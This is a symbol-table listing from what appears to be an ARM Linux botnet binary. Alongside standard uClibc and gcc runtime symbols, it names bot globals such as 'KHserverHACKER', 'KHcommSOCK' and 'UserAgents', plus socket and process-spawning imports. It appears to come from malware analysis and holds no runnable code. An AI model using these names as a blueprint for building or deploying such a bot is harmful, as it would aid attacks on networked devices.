$d | .symtab | 0x16cb0 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x2f608 | 0 | NOTYPE | <unknown> | DEFAULT | 13 | ||
$d | .symtab | 0x16cd8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1707c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x17340 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x17708 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x18318 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x20c20 | 0 | NOTYPE | <unknown> | DEFAULT | 4 | ||
$d | .symtab | 0x18400 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x184bc | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1862c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x18840 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x18988 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x18fa8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x19114 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x191f4 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x193a0 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x194d8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x197ac | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x197fc | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x19d3c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1a250 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1a618 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1aec8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1af50 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1afa8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1b3c4 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1b48c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1bbbc | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1bdbc | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x1be60 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$d | .symtab | 0x293b0 | 0 | NOTYPE | <unknown> | DEFAULT | 12 | ||
$t | .symtab | 0x80d0 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
/home/landley/work/ab7/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
/home/landley/work/ab7/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
/home/landley/work/ab7/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
/home/landley/work/ab7/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
/home/landley/work/ab7/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
/home/landley/work/ab7/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
/home/landley/work/ab7/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
C.1.3506 | .symtab | 0x20bec | 24 | OBJECT | <unknown> | DEFAULT | 4 | ||
C.147.6116 | .symtab | 0x1eecc | 40 | OBJECT | <unknown> | DEFAULT | 4 | ||
C.177.6397 | .symtab | 0x1ef38 | 16 | OBJECT | <unknown> | DEFAULT | 4 | ||
C.178.6398 | .symtab | 0x1ef0c | 20 | OBJECT | <unknown> | DEFAULT | 4 | ||
KHcommSOCK | .symtab | 0x293d8 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
KHserverHACKER | .symtab | 0x29148 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
LOCAL_ADDR | .symtab | 0x2f634 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
Laligned | .symtab | 0x12fe8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
Llastword | .symtab | 0x13004 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
Q | .symtab | 0x293f4 | 16384 | OBJECT | <unknown> | DEFAULT | 13 | ||
UserAgents | .symtab | 0x290b8 | 144 | OBJECT | <unknown> | DEFAULT | 12 | ||
_Exit | .symtab | 0x11a80 | 44 | FUNC | <unknown> | DEFAULT | 2 | ||
_GLOBAL_OFFSET_TABLE_ | .symtab | 0x29024 | 0 | OBJECT | <unknown> | HIDDEN | 11 | ||
_Jv_RegisterClasses | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
_READ.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
_WRITE.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__C_ctype_b | .symtab | 0x2915c | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__C_ctype_b.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__C_ctype_b_data | .symtab | 0x1f944 | 768 | OBJECT | <unknown> | DEFAULT | 4 | ||
__C_ctype_tolower | .symtab | 0x293b0 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__C_ctype_tolower.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__C_ctype_tolower_data | .symtab | 0x20cec | 768 | OBJECT | <unknown> | DEFAULT | 4 | ||
__C_ctype_toupper | .symtab | 0x29164 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__C_ctype_toupper.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__C_ctype_toupper_data | .symtab | 0x1fc44 | 768 | OBJECT | <unknown> | DEFAULT | 4 | ||
__EH_FRAME_BEGIN__ | .symtab | 0x29014 | 0 | OBJECT | <unknown> | DEFAULT | 7 | ||
__FRAME_END__ | .symtab | 0x29014 | 0 | OBJECT | <unknown> | DEFAULT | 7 | ||
__GI___C_ctype_b | .symtab | 0x2915c | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
__GI___C_ctype_tolower | .symtab | 0x293b0 | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
__GI___C_ctype_toupper | .symtab | 0x29164 | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
__GI___ctype_b | .symtab | 0x29160 | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
__GI___ctype_tolower | .symtab | 0x293b4 | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
__GI___ctype_toupper | .symtab | 0x29168 | 4 | OBJECT | <unknown> | HIDDEN | 12 | ||
__GI___errno_location | .symtab | 0x11b48 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___fcntl_nocancel | .symtab | 0x1198c | 108 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___fgetc_unlocked | .symtab | 0x18864 | 300 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___glibc_strerror_r | .symtab | 0x13408 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___h_errno_location | .symtab | 0x16cc4 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___libc_fcntl | .symtab | 0x11920 | 108 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___sigaddset | .symtab | 0x13a68 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___sigdelset | .symtab | 0x13a8c | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___sigismember | .symtab | 0x13a44 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___uClibc_fini | .symtab | 0x16104 | 124 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___uClibc_init | .symtab | 0x161d4 | 108 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI___xpg_strerror_r | .symtab | 0x13450 | 256 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI__exit | .symtab | 0x11a80 | 44 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_abort | .symtab | 0x14e10 | 296 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_atoi | .symtab | 0x15540 | 32 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_brk | .symtab | 0x197b8 | 76 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_clock_getres | .symtab | 0x166e0 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_close | .symtab | 0x11ae4 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_closedir | .symtab | 0x168cc | 248 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_config_close | .symtab | 0x17008 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_config_open | .symtab | 0x1703c | 72 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_config_read | .symtab | 0x16ce0 | 808 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_connect | .symtab | 0x136fc | 56 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_dup2 | .symtab | 0x11620 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_errno | .symtab | 0x2f608 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__GI_execl | .symtab | 0x15fc4 | 172 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_execve | .symtab | 0x16670 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_exit | .symtab | 0x1573c | 184 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fclose | .symtab | 0x171ac | 436 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fcntl | .symtab | 0x11920 | 108 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fflush_unlocked | .symtab | 0x18658 | 524 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fgetc | .symtab | 0x18338 | 220 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fgetc_unlocked | .symtab | 0x18864 | 300 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fgets | .symtab | 0x18414 | 188 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fgets_unlocked | .symtab | 0x18990 | 160 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fopen | .symtab | 0x17360 | 32 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fork | .symtab | 0x11794 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fputs_unlocked | .symtab | 0x12e38 | 56 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fseek | .symtab | 0x19bdc | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fseeko64 | .symtab | 0x19c00 | 336 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fstat | .symtab | 0x19810 | 88 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_fwrite_unlocked | .symtab | 0x12e70 | 176 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getc_unlocked | .symtab | 0x18864 | 300 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getdtablesize | .symtab | 0x1188c | 44 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getegid | .symtab | 0x16748 | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_geteuid | .symtab | 0x11780 | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getgid | .symtab | 0x167c8 | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_gethostbyname | .symtab | 0x13678 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_gethostbyname2 | .symtab | 0x13694 | 104 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_gethostbyname2_r | .symtab | 0x194e0 | 672 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_gethostbyname_r | .symtab | 0x1b4f0 | 760 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_gethostname | .symtab | 0x1b81c | 120 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getpagesize | .symtab | 0x166a4 | 40 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getpid | .symtab | 0x116fc | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getrlimit | .symtab | 0x16714 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getsockname | .symtab | 0x13734 | 56 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_gettimeofday | .symtab | 0x118ec | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_getuid | .symtab | 0x166cc | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_h_errno | .symtab | 0x2f60c | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__GI_htonl | .symtab | 0x13600 | 32 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_htons | .symtab | 0x135f0 | 16 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_inet_addr | .symtab | 0x13650 | 40 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_inet_aton | .symtab | 0x193e8 | 248 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_inet_ntop | .symtab | 0x1a3a0 | 644 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_inet_pton | .symtab | 0x1a040 | 540 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_initstate_r | .symtab | 0x1545c | 228 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_ioctl | .symtab | 0x11a2c | 84 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_isatty | .symtab | 0x13550 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_kill | .symtab | 0x118b8 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_lseek64 | .symtab | 0x1b8ec | 100 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_memchr | .symtab | 0x18ec0 | 240 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_memcpy | .symtab | 0x13050 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_memmove | .symtab | 0x1b950 | 4 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_mempcpy | .symtab | 0x19298 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_memrchr | .symtab | 0x1911c | 224 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_memset | .symtab | 0x12f20 | 156 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_mmap | .symtab | 0x16514 | 104 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_mremap | .symtab | 0x16844 | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_munmap | .symtab | 0x167dc | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_nanosleep | .symtab | 0x16810 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_ntohl | .symtab | 0x13630 | 32 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_ntohs | .symtab | 0x13620 | 16 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_open | .symtab | 0x11668 | 96 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_opendir | .symtab | 0x16a94 | 172 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_pipe | .symtab | 0x116c8 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_poll | .symtab | 0x1b7e8 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_raise | .symtab | 0x13918 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_random | .symtab | 0x14f50 | 164 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_random_r | .symtab | 0x152f4 | 144 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_rawmemchr | .symtab | 0x1906c | 176 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_read | .symtab | 0x11858 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_readdir64 | .symtab | 0x16bd8 | 236 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_recv | .symtab | 0x137b0 | 56 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_recvfrom | .symtab | 0x137e8 | 60 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sbrk | .symtab | 0x1675c | 108 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_select | .symtab | 0x11818 | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_send | .symtab | 0x13824 | 56 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sendto | .symtab | 0x1385c | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_setsockopt | .symtab | 0x1389c | 68 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_setstate_r | .symtab | 0x15210 | 228 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sigaction | .symtab | 0x1659c | 136 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sigaddset | .symtab | 0x13934 | 68 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sigemptyset | .symtab | 0x13978 | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_signal | .symtab | 0x1398c | 184 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sigprocmask | .symtab | 0x11aac | 56 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sleep | .symtab | 0x157f4 | 172 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_socket | .symtab | 0x138e0 | 56 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sprintf | .symtab | 0x11b98 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_srandom_r | .symtab | 0x15384 | 216 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_stat | .symtab | 0x1b894 | 88 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strcasecmp | .symtab | 0x1bdfc | 108 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strchr | .symtab | 0x13318 | 240 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strchrnul | .symtab | 0x192bc | 236 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strcmp | .symtab | 0x13030 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strcoll | .symtab | 0x13030 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strcpy | .symtab | 0x13238 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strcspn | .symtab | 0x19028 | 68 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strdup | .symtab | 0x1b960 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strlen | .symtab | 0x12fc0 | 96 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strncpy | .symtab | 0x1325c | 188 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strnlen | .symtab | 0x1316c | 204 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strpbrk | .symtab | 0x193a8 | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strrchr | .symtab | 0x19248 | 80 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strspn | .symtab | 0x191fc | 76 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strstr | .symtab | 0x13070 | 252 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strtok | .symtab | 0x13420 | 48 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strtok_r | .symtab | 0x18fb0 | 120 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_strtol | .symtab | 0x15560 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_sysconf | .symtab | 0x159ec | 1496 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_tcgetattr | .symtab | 0x13574 | 124 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_time | .symtab | 0x11710 | 48 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_times | .symtab | 0x16884 | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_toupper | .symtab | 0x11b18 | 48 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_uname | .symtab | 0x1bdc8 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_vfork | .symtab | 0x115e0 | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_vsnprintf | .symtab | 0x11bcc | 180 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_wait4 | .symtab | 0x1663c | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_waitpid | .symtab | 0x117c8 | 28 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_wcrtomb | .symtab | 0x17084 | 84 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_wcsnrtombs | .symtab | 0x170fc | 176 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_wcsrtombs | .symtab | 0x170d8 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__GI_write | .symtab | 0x119f8 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__JCR_END__ | .symtab | 0x29020 | 0 | OBJECT | <unknown> | DEFAULT | 10 | ||
__JCR_LIST__ | .symtab | 0x29020 | 0 | OBJECT | <unknown> | DEFAULT | 10 | ||
__adddf3 | .symtab | 0x1c064 | 784 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_cdcmpeq | .symtab | 0x1c9c0 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_cdcmple | .symtab | 0x1c9c0 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_cdrcmple | .symtab | 0x1c9a4 | 52 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_d2uiz | .symtab | 0x1ca50 | 84 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dadd | .symtab | 0x1c064 | 784 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dcmpeq | .symtab | 0x1c9d8 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dcmpge | .symtab | 0x1ca20 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dcmpgt | .symtab | 0x1ca38 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dcmple | .symtab | 0x1ca08 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dcmplt | .symtab | 0x1c9f0 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_ddiv | .symtab | 0x1c704 | 524 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dmul | .symtab | 0x1c474 | 656 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_drsub | .symtab | 0x1c058 | 0 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_dsub | .symtab | 0x1c060 | 788 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_f2d | .symtab | 0x1c3c0 | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_i2d | .symtab | 0x1c398 | 40 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_idiv | .symtab | 0x1bf14 | 0 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_idivmod | .symtab | 0x1c040 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_l2d | .symtab | 0x1c414 | 96 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_ui2d | .symtab | 0x1c374 | 36 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_uidiv | .symtab | 0x114b4 | 0 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_uidivmod | .symtab | 0x115b0 | 24 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_ul2d | .symtab | 0x1c400 | 116 | FUNC | <unknown> | HIDDEN | 2 | ||
__aeabi_unwind_cpp_pr0 | .symtab | 0x19804 | 4 | FUNC | <unknown> | DEFAULT | 2 | ||
__aeabi_unwind_cpp_pr1 | .symtab | 0x19808 | 4 | FUNC | <unknown> | DEFAULT | 2 | ||
__aeabi_unwind_cpp_pr2 | .symtab | 0x1980c | 4 | FUNC | <unknown> | DEFAULT | 2 | ||
__app_fini | .symtab | 0x2f600 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__atexit_lock | .symtab | 0x29388 | 24 | OBJECT | <unknown> | DEFAULT | 12 | ||
__bss_end__ | .symtab | 0x2fb24 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
__bss_start | .symtab | 0x293b8 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
__bss_start__ | .symtab | 0x293b8 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
__check_one_fd | .symtab | 0x16180 | 84 | FUNC | <unknown> | DEFAULT | 2 | ||
__close_nameservers | .symtab | 0x1b40c | 152 | FUNC | <unknown> | HIDDEN | 2 | ||
__cmpdf2 | .symtab | 0x1c920 | 132 | FUNC | <unknown> | HIDDEN | 2 | ||
__ctype_b | .symtab | 0x29160 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__ctype_tolower | .symtab | 0x293b4 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__ctype_toupper | .symtab | 0x29168 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
__curbrk | .symtab | 0x2f610 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__data_start | .symtab | 0x2909c | 0 | NOTYPE | <unknown> | DEFAULT | 12 | ||
__decode_dotted | .symtab | 0x1a624 | 248 | FUNC | <unknown> | HIDDEN | 2 | ||
__decode_header | .symtab | 0x1ba80 | 180 | FUNC | <unknown> | HIDDEN | 2 | ||
__default_rt_sa_restorer | .symtab | 0x16634 | 0 | FUNC | <unknown> | DEFAULT | 2 | ||
__default_sa_restorer | .symtab | 0x16628 | 0 | FUNC | <unknown> | DEFAULT | 2 | ||
__deregister_frame_info | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
__div0 | .symtab | 0x115c8 | 20 | FUNC | <unknown> | HIDDEN | 2 | ||
__divdf3 | .symtab | 0x1c704 | 524 | FUNC | <unknown> | HIDDEN | 2 | ||
__divsi3 | .symtab | 0x1bf14 | 300 | FUNC | <unknown> | HIDDEN | 2 | ||
__dns_lookup | .symtab | 0x1a71c | 2024 | FUNC | <unknown> | HIDDEN | 2 | ||
__do_global_dtors_aux | .symtab | 0x810c | 0 | FUNC | <unknown> | DEFAULT | 2 | ||
__do_global_dtors_aux_fini_array_entry | .symtab | 0x2901c | 0 | OBJECT | <unknown> | DEFAULT | 9 | ||
__dso_handle | .symtab | 0x2909c | 0 | OBJECT | <unknown> | HIDDEN | 12 | ||
__encode_dotted | .symtab | 0x1be68 | 172 | FUNC | <unknown> | HIDDEN | 2 | ||
__encode_header | .symtab | 0x1b994 | 236 | FUNC | <unknown> | HIDDEN | 2 | ||
__encode_question | .symtab | 0x1bb34 | 96 | FUNC | <unknown> | HIDDEN | 2 | ||
__end__ | .symtab | 0x2fb24 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
__environ | .symtab | 0x2f5f8 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
__eqdf2 | .symtab | 0x1c920 | 132 | FUNC | <unknown> | HIDDEN | 2 | ||
__errno_location | .symtab | 0x11b48 | 28 | FUNC | <unknown> | DEFAULT | 2 | ||
__errno_location.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
__error | .symtab | 0x1161c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
__exidx_end | .symtab | 0x21014 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
__exidx_start | .symtab | 0x21004 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_ABS | ||
__exit_cleanup | .symtab | 0x2f5f0 | 4 | OBJECT | <unknown> | HIDDEN | 13 | ||
__extendsfdf2 | .symtab | 0x1c3c0 | 64 | FUNC | <unknown> | HIDDEN | 2 | ||
__fcntl_nocancel | .symtab | 0x1198c | 108 | FUNC | <unknown> | DEFAULT | 2 | ||
__fgetc_unlocked | .symtab | 0x18864 | 300 | FUNC | <unknown> | DEFAULT | 2 | ||
__fini_array_end | .symtab | 0x29020 | 0 | NOTYPE | <unknown> | HIDDEN | 9 | ||
__fini_array_start | .symtab | 0x2901c | 0 | NOTYPE | <unknown> | HIDDEN | 9 | ||
__fixunsdfsi | .symtab | 0x1ca50 | 84 | FUNC | <unknown> | HIDDEN | 2 | ||
__floatdidf | .symtab | 0x1c414 | 96 | FUNC | <unknown> | HIDDEN | 2 | ||
